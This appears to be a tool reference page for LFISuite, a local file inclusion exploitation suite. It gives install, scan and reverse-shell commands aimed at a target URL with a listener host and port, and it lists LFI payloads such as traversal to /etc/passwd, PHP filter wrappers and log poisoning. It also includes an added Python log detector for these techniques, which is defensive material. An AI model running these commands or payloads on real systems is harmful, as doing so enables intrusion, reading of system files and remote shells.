Description
LFISuite is an all-in-one LFI exploitation suite. It performs automatic scanning for LFI vulnerabilities and can escalate to reverse shell via multiple techniques including /proc/self/environ, PHP filter, log poisoning, and data:// wrapper.
Installation
BASH
git clone https://github.com/D35m0nd142/LFISuite.git
cd LFISuite
pip install -r requirements.txt
Basic Usage
BASH
# Interactive mode
python2 lfisuite.py
# Select options:
# 1. Exploiter — exploit known LFI
# 2. Scanner — scan for LFI
# 3. Reverse shell — LFI → RCE with reverse shell
Advanced Usage
BASH
# Auto-exploit URL
python2 lfisuite.py --exploit -u "https://target.com/page?file="
# Scan mode with URL list
python2 lfisuite.py --scan -f urls.txt
# Reverse shell through LFI
python2 lfisuite.py --revshell -u "https://target.com/page?file=" --lhost 10.0.0.1 --lport 4444
Techniques Used
- Path traversal (../../etc/passwd)
- Null byte injection (../../etc/passwd%00)
- Double encoding (%252e%252e%252f)
- PHP filter wrappers (php://filter/convert.base64-encode/resource=)
- data:// wrapper injection
- /proc/self/environ injection
- Log file poisoning (/var/log/apache2/access.log)
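Each technique above leaves a recognisable trace in the web server's access log, which is what a defender should hunt for. The following is an added example, not code from LFISuite or this page: a small Python detector that repeatedly URL-decodes each request target (so double encoding collapses to plain traversal) and flags the indicators listed above, plus PHP tags in the User-Agent as a sign of log or environ poisoning. The access-log lines and the log format regex are constructed for this example.

```python
import re
from urllib.parse import unquote

# Signatures for the LFI techniques listed above, checked against the decoded request target.
LFI_PATTERNS = {
    "path_traversal": re.compile(r"(\.\./|\.\.\\)"),
    "null_byte": re.compile(r"\x00"),
    "php_filter_wrapper": re.compile(r"php://filter", re.I),
    "data_wrapper": re.compile(r"data:", re.I),
    "proc_self_environ": re.compile(r"/proc/self/environ", re.I),
    "log_file_include": re.compile(r"/var/log/", re.I),
    "sensitive_file": re.compile(r"/etc/passwd", re.I),
}

def normalize(value, rounds=3):
    """URL-decode until the string stops changing, so %252e%252e%252f becomes ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_request(target):
    """Return the names of every signature that matches the decoded request target."""
    decoded = normalize(target)
    return [name for name, pat in LFI_PATTERNS.items() if pat.search(decoded)]

# Constructed sample access-log lines in combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /page?file=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /page?file=../../etc/passwd%00 HTTP/1.1" 200 1024 "-" "curl/7.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /page?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1024 "-" "curl/7.0"
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /page?file=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 2048 "-" "curl/7.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /page?file=/proc/self/environ HTTP/1.1" 200 300 "-" "<?php echo 1; ?>"
"""

# Assumed combined log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"')

def scan_log(text):
    """Return (client IP, matched technique names) for each log line that trips a signature.
    The User-Agent is inspected too, since /proc/self/environ and log poisoning carry
    their PHP payload in request headers rather than in the URL."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        techniques = classify_request(m["target"])
        if "<?php" in m["ua"].lower():
            techniques.append("php_in_user_agent")
        if techniques:
            hits.append((m["ip"], techniques))
    return hits

if __name__ == "__main__":
    for ip, techs in scan_log(SAMPLE_LOG):
        print(ip, techs)
```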
Common Workflows
BASH
# Quick LFI scan
python2 lfisuite.py --scan -f target_urls.txt
# If an LFI is found, attempt a reverse shell
python2 lfisuite.py --revshell -u "https://target.com/page?file=" --lhost YOUR_IP --lport 4444